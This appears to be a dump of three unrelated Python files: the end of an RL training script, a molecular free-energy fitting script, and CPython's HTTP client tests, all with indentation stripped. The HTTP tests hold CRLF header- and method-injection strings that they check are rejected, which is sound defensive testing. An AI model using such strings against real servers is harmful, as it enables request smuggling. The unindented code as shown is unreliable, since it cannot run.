except KeyboardInterrupt:
pass # Close properly.
else:
logging.info("Learning finished after %i steps.", stats["step"])
checkpoint()
# Done with learning. Let's stop all the ongoing work.
inference_batcher.close()
learner_queue.close()
actorpool_thread.join()
for t in learner_threads + inference_threads:
t.join()
def test(flags):
test_checkpoint = os.path.join(flags.savedir, "test_checkpoint.tar")
if not os.path.exists(os.path.dirname(test_checkpoint)):
os.makedirs(os.path.dirname(test_checkpoint))
logging.info("Creating test copy of checkpoint '%s'", flags.checkpoint)
checkpoint = torch.load(flags.checkpoint)
for d in checkpoint["optimizer_state_dict"]["param_groups"]:
d["lr"] = 0.0
d["initial_lr"] = 0.0
checkpoint["scheduler_state_dict"]["last_epoch"] = 0
checkpoint["scheduler_state_dict"]["_step_count"] = 0
checkpoint["scheduler_state_dict"]["base_lrs"] = [0.0]
checkpoint["stats"]["step"] = 0
checkpoint["stats"]["_tick"] = 0
flags.checkpoint = test_checkpoint
flags.learning_rate = 0.0
logging.info("Saving test checkpoint to %s", test_checkpoint)
torch.save(checkpoint, test_checkpoint)
train(flags)
def main(flags):
if flags.wandb:
flags_dict = omegaconf.OmegaConf.to_container(flags)
wandb.init(
project=flags.project,
config=flags_dict,
group=flags.group,
entity=flags.entity,
)
if flags.mode == "train":
if flags.write_profiler_trace:
logging.info("Running with profiler.")
with torch.autograd.profiler.profile() as prof:
train(flags)
filename = "chrome-%s.trace" % time.strftime("%Y%m%d-%H%M%S")
logging.info("Writing profiler trace to '%s.gz'", filename)
prof.export_chrome_trace(filename)
os.system("gzip %s" % filename)
else:
train(flags)
elif flags.mode.startswith("test"):
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
flags.total_steps = int(flags.total_steps) # Allows e.g. 1e6.
main(flags)
|
parameterize_simple.py
|
import copy
import argparse
import time
import numpy as np
from io import StringIO
import itertools
import os
import sys
from jax.config import config as jax_config
# this always needs to be set
jax_config.update("jax_enable_x64", True)
from scipy.stats import special_ortho_group
import jax
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from simtk.openmm import app
from simtk.openmm.app import PDBFile
from timemachine.lib import custom_ops, ops
from fe.utils import to_md_units, write
from fe import math_utils
from multiprocessing import Process, Pipe
from matplotlib import pyplot as plt
from jax.experimental import optimizers
from fe import simulation
from fe import loss
from fe.pdb_writer import PDBWriter
from ff import forcefield
from ff import system
from ff import openmm_converter
def com(conf):
return np.sum(conf, axis=0)/conf.shape[0]
def recenter(conf, true_com, scale_factor=1):
mol_com = np.sum(conf, axis=0)/conf.shape[0]
centered = conf - mol_com # centered to origin
return true_com + centered/scale_factor
from hilbertcurve.hilbertcurve import HilbertCurve
def hilbert_sort(conf):
hc = HilbertCurve(16, 3)
int_confs = (conf*1000).astype(np.int64)+10000
dists = []
for xyz in int_confs.tolist():
dist = hc.distance_from_coordinates(xyz)
dists.append(dist)
perm = np.argsort(dists)
return perm
def get_masses(m):
masses = []
for a in m.GetAtoms():
masses.append(a.GetMass())
return masses
import jax.numpy as jnp
def error_fn(all_du_dls, T, schedule, true_dG):
fwd = all_du_dls[:, :T//2]
fwd_sched = schedule[:T//2]
bkwd = all_du_dls[:, T//2:]
bkwd_sched = schedule[T//2:]
dG_fwd = math_utils.trapz(fwd, fwd_sched) # integral from inf to 0
dG_bkwd = math_utils.trapz(bkwd, bkwd_sched) # integral from 0 to inf
# dG_fwd and dG_bkwd have the same sign, so we need to flip dG_bkwd so the
# direction of integral is the same (requirement for pymbar.BAR)
dG_bkwd = -dG_bkwd # this is needed for BAR to be correct
# this is in kJ/mol, inputs to BAR needs to be in 1/kT.
kT = 2.479
# kT = 1
dG_fwd /= kT
dG_bkwd /= kT
pred_dG = loss.mybar(jnp.stack([dG_fwd, dG_bkwd]))
pred_dG *= kT
print("fwd", dG_fwd)
print("bwd", dG_bkwd)
print("pred_dG", pred_dG)
return jnp.abs(pred_dG - true_dG)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Quick Test')
parser.add_argument('--out_dir', type=str, required=True)
parser.add_argument('--precision', type=str, required=True)
parser.add_argument('--complex_pdb', type=str, required=True)
parser.add_argument('--ligand_sdf', type=str, required=True)
parser.add_argument('--num_gpus', type=int, required=True)
parser.add_argument('--num_conformers', type=int, required=True)
parser.add_argument('--forcefield', type=str, required=True)
args = parser.parse_args()
assert os.path.isdir(args.out_dir)
if args.precision == 'single':
precision = np.float32
elif args.precision == 'double':
precision = np.float64
else:
raise Exception("precision must be either single or double")
suppl = Chem.SDMolSupplier(args.ligand_sdf, removeHs=False)
all_guest_mols = []
for guest_mol in suppl:
all_guest_mols.append(guest_mol)
np.random.seed(123)
perm = np.arange(len(all_guest_mols))
np.random.shuffle(perm)
print(perm)
# np.random.shuffl(all_guest_mols)
guest_mol = all_guest_mols[perm[0]]
# break
num_gpus = args.num_gpus
all_du_dls = []
start = 1e3
end = 1.0
NT = 500
base = np.exp(np.log(end/start)/NT)
exps = np.arange(NT)
part_one = np.power(base, exps)*start
part_two = np.linspace(1.0, 0.3, 1000)
part_three = np.linspace(0.3, 0.0, 5000)
forward_schedule = np.concatenate([part_one, part_two, part_three])
backward_schedule = forward_schedule[::-1]
lambda_schedule = np.concatenate([forward_schedule, backward_schedule])
T = lambda_schedule.shape[0]
assert T % 2 == 0
dt = 0.0015
step_sizes = np.ones(T)*dt
assert T % 2 == 0
cas = np.ones(T)*0.93
epoch = 0
init_conf = guest_mol.GetConformer(0)
init_conf = np.array(init_conf.GetPositions(), dtype=np.float64)
init_conf = init_conf/10 # convert to md_units
conf_com = com(init_conf)
init_mol = Chem.Mol(guest_mol)
num_conformers = args.num_conformers
# generate a set of gas phase conformers using the RDKit
guest_mol.RemoveAllConformers()
AllChem.EmbedMultipleConfs(guest_mol, num_conformers, randomSeed=2020)
np.random.seed(2020)
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
rot_matrix = special_ortho_group.rvs(3).astype(dtype=np.float64)
guest_conf = np.matmul(guest_conf, rot_matrix)*10
for atom_idx, pos in enumerate(guest_conf):
conformer.SetAtomPosition(atom_idx, (float(pos[0]), float(pos[1]), float(pos[2])))
lr = 5e-4
# opt_init, opt_update, get_params = optimizers.adam(lr)
opt_init, opt_update, get_params = optimizers.sgd(lr)
host_pdb_file = args.complex_pdb
host_pdb = app.PDBFile(host_pdb_file)
host_conf = []
for x,y,z in host_pdb.positions:
host_conf.append([to_md_units(x),to_md_units(y),to_md_units(z)])
host_conf = np.array(host_conf)
host_name = "complex"
# set up the system
amber_ff = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
host_system = amber_ff.createSystem(host_pdb.topology,
nonbondedMethod=app.NoCutoff,
constraints=None,
rigidWater=False)
cutoff = 1.25
host_system = openmm_converter.deserialize_system(host_system, cutoff=cutoff)
num_host_atoms = len(host_system.masses)
print("num_host_atoms", num_host_atoms)
# open_ff = forcefield.Forcefield("ff/smirnoff_1.1.0.py")
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol, cutoff=cutoff)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
combined_system = host_system.merge(guest_system)
# cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
cbs = -0.0001/np.array(combined_system.masses)
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = 1
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
initial_params = sim.system.params
opt_state = opt_init(initial_params)
num_epochs = 100
for epoch in range(num_epochs):
# sample from the rdkit DG distribution (this can be changed later to another distribution later on)
epoch_params = get_params(opt_state )
# deepy and openff param at start
epoch_ff_params = copy.deepcopy(open_ff)
epoch_ff_params.params = epoch_params[len(host_system.params):]
fname = "epoch_"+str(epoch)+"_params"
fpath = os.path.join(args.out_dir, fname)
epoch_ff_params.save(fpath)
sim.system.params = np.asarray(epoch_params)
all_args = []
child_conns = []
parent_conns = []
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
guest_conf = recenter(guest_conf, conf_com)
x0 = np.concatenate([host_conf, guest_conf]) # combined geometry
combined_pdb = Chem.CombineMols(Chem.MolFromPDBFile(host_pdb_file, removeHs=False), init_mol)
combined_pdb_str = StringIO(Chem.MolToPDBBlock(combined_pdb))
out_file = os.path.join(args.out_dir, "epoch_"+str(epoch)+"_insertion_deletion_"+host_name+"_conf_"+str(conf_idx)+".pdb")
writer = PDBWriter(combined_pdb_str, out_file)
v0 = np.zeros_like(x0)
parent_conn, child_conn = Pipe()
parent_conns.append(parent_conn)
# writer can be None if we don't care about vis
all_args.append([x0, v0, conf_idx % num_gpus, writer, child_conn])
processes = []
for arg in all_args:
p = Process(target=sim.run_forward_and_backward, args=arg)
p.daemon = True
processes.append(p)
p.start()
all_du_dls = []
for pc in parent_conns:
du_dls = pc.recv()
all_du_dls.append(du_dls)
all_du_dls = np.array(all_du_dls)
loss_grad_fn = jax.grad(error_fn, argnums=(0,))
for du_dls in all_du_dls:
fwd = du_dls[:T//2]
bkwd = du_dls[T//2:]
plt.plot(np.log(lambda_schedule[:T//2]), fwd)
plt.plot(np.log(lambda_schedule[T//2:]), bkwd)
plt.savefig(os.path.join(args.out_dir, "epoch_"+str(epoch)+"_du_dls"))
# plt.show()
true_dG = 26.61024 # -6.36 * 4.184 * -1 (for insertion)
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---- LOSS", error)
error_grad = loss_grad_fn(all_du_dls, T, lambda_schedule, true_dG)
all_du_dl_adjoints = error_grad[0]
# send everything at once
for pc, du_dl_adjoints in zip(parent_conns, all_du_dl_adjoints):
pc.send(du_dl_adjoints)
# receive everything at once
all_dl_dps = []
for pc in parent_conns:
dl_dp = pc.recv()
all_dl_dps.append(dl_dp)
# terminate all the processes
for p in processes:
p.join()
all_dl_dps = np.array(all_dl_dps)
all_dl_dps = np.sum(all_dl_dps, axis=0)
allowed_groups = {
7: 0.5,
14: 0.5, # small_molecule charge
# 12: 1e-2, # GB atomic radii
13: 1e-2 # GB scale factor
}
filtered_grad = []
for g_idx, (g, gp) in enumerate(zip(all_dl_dps, sim.system.param_groups)):
if gp in allowed_groups:
pf = allowed_groups[gp]
filtered_grad.append(g*pf)
if g != 0:
print("derivs", g_idx, '\t group', gp, '\t', g, '\t adjusted to', g*pf, '\t old val', sim.system.params[g_idx])
else:
filtered_grad.append(0)
filtered_grad = np.array(filtered_grad)
opt_state = opt_update(epoch, filtered_grad, opt_state)
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import socket
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
self.file.close = self.file_close #nerf close ()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
